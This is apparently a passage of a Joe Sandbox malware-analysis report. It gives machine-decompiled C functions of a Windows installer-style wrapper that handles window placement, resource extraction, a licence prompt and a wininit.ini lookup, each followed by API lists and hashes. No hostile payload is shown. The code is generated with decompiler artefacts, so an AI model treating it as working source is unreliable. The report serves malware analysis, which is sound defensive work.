                                                                                                                                                                                                                                                0x00022b26
                                                                                                                                                                                                                                                0x00022bda
                                                                                                                                                                                                                                                0x00022bda
                                                                                                                                                                                                                                                0x00022be6
                                                                                                                                                                                                                                                0x00022be6
                                                                                                                                                                                                                                                0x00022bf8

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00022AE6
                                                                                                                                                                                                                                                • IsDBCSLeadByte.KERNEL32(00000000), ref: 00022AF2
                                                                                                                                                                                                                                                • CharNextA.USER32(?), ref: 00022B12
                                                                                                                                                                                                                                                • CharUpperA.USER32 ref: 00022B1E
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,?), ref: 00022B55
                                                                                                                                                                                                                                                • CharNextA.USER32(?), ref: 00022BD4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 571164536-0
                                                                                                                                                                                                                                                • Opcode ID: b655028571a7923eed34aa933c6682649886455c29e8a6d00232948ba0d57930
                                                                                                                                                                                                                                                • Instruction ID: 2dbbbebd71c2afe18add7d6c49a66729588107364ca52cd271ec7733a4290fb8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b655028571a7923eed34aa933c6682649886455c29e8a6d00232948ba0d57930
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E64127346042656FDB669F74AC54AFD7BA99F57310F14009AE8C287202DF394E86CB51
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000243D0 Relevance: 10.6, APIs: 7, Instructions: 97COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                                			E000243D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x28004; // 0xf4950d3e
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E00026CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}
























                                                                                                                                                                                                                                                0x000243d0
                                                                                                                                                                                                                                                0x000243d8
                                                                                                                                                                                                                                                0x000243df
                                                                                                                                                                                                                                                0x000243e6
                                                                                                                                                                                                                                                0x000243ec
                                                                                                                                                                                                                                                0x000243f1
                                                                                                                                                                                                                                                0x00024400
                                                                                                                                                                                                                                                0x00024403
                                                                                                                                                                                                                                                0x0002440b
                                                                                                                                                                                                                                                0x00024420
                                                                                                                                                                                                                                                0x00024429
                                                                                                                                                                                                                                                0x00024437
                                                                                                                                                                                                                                                0x00024444
                                                                                                                                                                                                                                                0x00024447
                                                                                                                                                                                                                                                0x0002444d
                                                                                                                                                                                                                                                0x00024454
                                                                                                                                                                                                                                                0x0002445b
                                                                                                                                                                                                                                                0x00024460
                                                                                                                                                                                                                                                0x00024461
                                                                                                                                                                                                                                                0x00024467
                                                                                                                                                                                                                                                0x0002446f
                                                                                                                                                                                                                                                0x00024473
                                                                                                                                                                                                                                                0x00024473
                                                                                                                                                                                                                                                0x00024463
                                                                                                                                                                                                                                                0x00024463
                                                                                                                                                                                                                                                0x00024463
                                                                                                                                                                                                                                                0x0002447a
                                                                                                                                                                                                                                                0x00024481
                                                                                                                                                                                                                                                0x00024484
                                                                                                                                                                                                                                                0x0002448a
                                                                                                                                                                                                                                                0x00024492
                                                                                                                                                                                                                                                0x00024496
                                                                                                                                                                                                                                                0x00024496
                                                                                                                                                                                                                                                0x00024486
                                                                                                                                                                                                                                                0x00024486
                                                                                                                                                                                                                                                0x00024486
                                                                                                                                                                                                                                                0x000244b8

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 000243F1
                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0002440B
                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00024423
                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 0002442E
                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0002443A
                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00024447
                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 000244A2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2212493051-0
                                                                                                                                                                                                                                                • Opcode ID: f87daf6916d748c6eac4d3ab3266a1187f9aa70be8fda9792e1e12e5e2dd6676
                                                                                                                                                                                                                                                • Instruction ID: 6277a578f59b09c0b013c51046551c7b9d7938181297b25d5203c45c3e49e06c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f87daf6916d748c6eac4d3ab3266a1187f9aa70be8fda9792e1e12e5e2dd6676
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED312D32F00119AFDB14DFB8DD899EEBBB5EB89310F254169F805F3250DA346D058B61
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00026298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 53%
                                                                                                                                                                                                                                                			E00026298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x28004; // 0xf4950d3e
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E0002171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x29124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x2a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E0002171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00026CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}






















                                                                                                                                                                                                                                                0x00026298
                                                                                                                                                                                                                                                0x000262a0
                                                                                                                                                                                                                                                0x000262a7
                                                                                                                                                                                                                                                0x000262ad
                                                                                                                                                                                                                                                0x000262af
                                                                                                                                                                                                                                                0x000262bb
                                                                                                                                                                                                                                                0x000262c3
                                                                                                                                                                                                                                                0x000262c4
                                                                                                                                                                                                                                                0x0002633b
                                                                                                                                                                                                                                                0x0002633b
                                                                                                                                                                                                                                                0x00026345
                                                                                                                                                                                                                                                0x0002634d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000262da
                                                                                                                                                                                                                                                0x000262de
                                                                                                                                                                                                                                                0x0002635f
                                                                                                                                                                                                                                                0x00026369
                                                                                                                                                                                                                                                0x000262e0
                                                                                                                                                                                                                                                0x000262e0
                                                                                                                                                                                                                                                0x000262e0
                                                                                                                                                                                                                                                0x000262e3
                                                                                                                                                                                                                                                0x000262e5
                                                                                                                                                                                                                                                0x000262e5
                                                                                                                                                                                                                                                0x000262e8
                                                                                                                                                                                                                                                0x000262e8
                                                                                                                                                                                                                                                0x000262ea
                                                                                                                                                                                                                                                0x000262eb
                                                                                                                                                                                                                                                0x000262ef
                                                                                                                                                                                                                                                0x000262f1
                                                                                                                                                                                                                                                0x000262f3
                                                                                                                                                                                                                                                0x00026302
                                                                                                                                                                                                                                                0x00026308
                                                                                                                                                                                                                                                0x0002630d
                                                                                                                                                                                                                                                0x00026314
                                                                                                                                                                                                                                                0x00026314
                                                                                                                                                                                                                                                0x00026316
                                                                                                                                                                                                                                                0x00026319
                                                                                                                                                                                                                                                0x00026355
                                                                                                                                                                                                                                                0x00026357
                                                                                                                                                                                                                                                0x0002631b
                                                                                                                                                                                                                                                0x0002631b
                                                                                                                                                                                                                                                0x00026331
                                                                                                                                                                                                                                                0x00026334
                                                                                                                                                                                                                                                0x00026339
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00026339
                                                                                                                                                                                                                                                0x00026319
                                                                                                                                                                                                                                                0x0002636b
                                                                                                                                                                                                                                                0x0002637d
                                                                                                                                                                                                                                                0x0002637d
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0002171E: _vsnprintf.MSVCRT ref: 00021750
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,000251CA,00000004,00000024,00022F71,?,00000002,00000000), ref: 000262CD
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,000251CA,00000004,00000024,00022F71,?,00000002,00000000), ref: 000262D4
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,000251CA,00000004,00000024,00022F71,?,00000002,00000000), ref: 0002631B
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00026345
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,000251CA,00000004,00000024,00022F71,?,00000002,00000000), ref: 00026357
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                                • String ID: UPDFILE%lu
                                                                                                                                                                                                                                                • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                                • Opcode ID: bcf11c2bf8b48972195902f8dc1eb3ee0af2abaa2c6c99e4f8bf39a9525ac2aa
                                                                                                                                                                                                                                                • Instruction ID: b2d699d5d3641e74044872e477d9f5acbea3aec8610d93cd911e027ad51eeb26
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bcf11c2bf8b48972195902f8dc1eb3ee0af2abaa2c6c99e4f8bf39a9525ac2aa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C21F675A00229AFDB20DF64EC459FE7B7CFB49710B200119F906A3241DB7A9E068BE0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 0002681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81registryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E0002681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x28004; // 0xf4950d3e
				_v8 = _t19 ^ _t44;
				_t41 =  *0x281d8; // 0x0
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x281d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x281d8; // 0x0
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x21140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E000266F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0x281d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				return E00026CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
			}


















                                                                                                                                                                                                                                                0x0002681f
                                                                                                                                                                                                                                                0x0002682a
                                                                                                                                                                                                                                                0x00026831
                                                                                                                                                                                                                                                0x00026836
                                                                                                                                                                                                                                                0x0002683c
                                                                                                                                                                                                                                                0x0002683e
                                                                                                                                                                                                                                                0x00026848
                                                                                                                                                                                                                                                0x00026851
                                                                                                                                                                                                                                                0x0002685d
                                                                                                                                                                                                                                                0x00026864
                                                                                                                                                                                                                                                0x00026876
                                                                                                                                                                                                                                                0x0002693a
                                                                                                                                                                                                                                                0x0002693a
                                                                                                                                                                                                                                                0x0002687c
                                                                                                                                                                                                                                                0x0002687e
                                                                                                                                                                                                                                                0x00026885
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000268d6
                                                                                                                                                                                                                                                0x000268f4
                                                                                                                                                                                                                                                0x00026900
                                                                                                                                                                                                                                                0x00026902
                                                                                                                                                                                                                                                0x0002690a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002690c
                                                                                                                                                                                                                                                0x0002690c
                                                                                                                                                                                                                                                0x0002691c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002691e
                                                                                                                                                                                                                                                0x00026924
                                                                                                                                                                                                                                                0x0002692b
                                                                                                                                                                                                                                                0x00026932
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002692b
                                                                                                                                                                                                                                                0x0002691c
                                                                                                                                                                                                                                                0x0002690a
                                                                                                                                                                                                                                                0x00026885
                                                                                                                                                                                                                                                0x00026876
                                                                                                                                                                                                                                                0x00026951

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0002686E
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000004A), ref: 000268A7
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 000268CC
                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,00021140,00000000,?,?,0000000C), ref: 000268F4
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00026902
                                                                                                                                                                                                                                                  • Part of subcall function 000266F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0002691A), ref: 00026741
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Control Panel\Desktop\ResourceLocale, xrefs: 000268C2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                                • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                                • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                                • Opcode ID: fe64abe05bf727a8d5d6e1d5dff7d1301b55655bd57201ee0b61dc7cf375abe4
                                                                                                                                                                                                                                                • Instruction ID: 46a66d22d0a65c32bf2e01e6e5eea3fc4f1cd5d61f73a0168a3ecbdf5a62a744
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe64abe05bf727a8d5d6e1d5dff7d1301b55655bd57201ee0b61dc7cf375abe4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3318F31A01228DFEB31CB11EC45BAAB7BCEB45728F1041E5E94DA6240DF359E96CF52
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00023A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73memorystringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00023A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E0002468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0x28d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E0002468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0x28d4c, "<None>") == 0) {
							LocalFree( *0x28d4c);
							L9:
							 *0x29124 = 0;
							return 1;
						}
						_t9 = E00026517(_t19, 0x7d1, 0, E00023100, 0, 0);
						LocalFree( *0x28d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x29124 = 0x800704c7;
						L2:
						return 0;
					}
					E000244B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x28d4c);
					 *0x29124 = 0x80070714;
					goto L2;
				}
				E000244B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x29124 = E00026285();
				goto L2;
			}






                                                                                                                                                                                                                                                0x00023a46
                                                                                                                                                                                                                                                0x00023a57
                                                                                                                                                                                                                                                0x00023a5d
                                                                                                                                                                                                                                                0x00023a63
                                                                                                                                                                                                                                                0x00023a6a
                                                                                                                                                                                                                                                0x00023a91
                                                                                                                                                                                                                                                0x00023a9a
                                                                                                                                                                                                                                                0x00023ad8
                                                                                                                                                                                                                                                0x00023b13
                                                                                                                                                                                                                                                0x00023b19
                                                                                                                                                                                                                                                0x00023b1b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023b21
                                                                                                                                                                                                                                                0x00023ae7
                                                                                                                                                                                                                                                0x00023af4
                                                                                                                                                                                                                                                0x00023afc
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023afe
                                                                                                                                                                                                                                                0x00023a87
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023a87
                                                                                                                                                                                                                                                0x00023aa8
                                                                                                                                                                                                                                                0x00023ab3
                                                                                                                                                                                                                                                0x00023ab9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00023ab9
                                                                                                                                                                                                                                                0x00023a78
                                                                                                                                                                                                                                                0x00023a82
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246A0
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: SizeofResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246A9
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246C3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LoadResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246CC
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LockResource.KERNEL32(00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246D3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: memcpy_s.MSVCRT ref: 000246E5
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000246EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00022F64,?,00000002,00000000), ref: 00023A5D
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00023AB3
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00024518
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00024554
                                                                                                                                                                                                                                                  • Part of subcall function 00026285: GetLastError.KERNEL32(00025BBC), ref: 00026285
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(<None>,00000000), ref: 00023AD0
                                                                                                                                                                                                                                                • LocalFree.KERNEL32 ref: 00023B13
                                                                                                                                                                                                                                                  • Part of subcall function 00026517: FindResourceA.KERNEL32(00020000,000007D6,00000005), ref: 0002652A
                                                                                                                                                                                                                                                  • Part of subcall function 00026517: LoadResource.KERNEL32(00020000,00000000,?,?,00022EE8,00000000,000219E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00026538
                                                                                                                                                                                                                                                  • Part of subcall function 00026517: DialogBoxIndirectParamA.USER32(00020000,00000000,00000547,000219E0,00000000), ref: 00026557
                                                                                                                                                                                                                                                  • Part of subcall function 00026517: FreeResource.KERNEL32(00000000,?,?,00022EE8,00000000,000219E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00026560
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00023100,00000000,00000000), ref: 00023AF4
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$LICENSE
                                                                                                                                                                                                                                                • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                                • Opcode ID: f0f61e4001060a910060591c3c0e30ad5e23ad0a3773f03a9c08735815824edf
                                                                                                                                                                                                                                                • Instruction ID: f65313b0a53f9e9eb9153008ccfdd09f059760596189680fec43511a162bb65c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f0f61e4001060a910060591c3c0e30ad5e23ad0a3773f03a9c08735815824edf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D119A34701221ABF7346F32BC09F5B3AF9DBD5710B20443EBA45D61A1DE7D88168665
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000224E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E000224E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x28004; // 0xf4950d3e
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E0002658A( &_v268, 0x104, "wininit.ini");
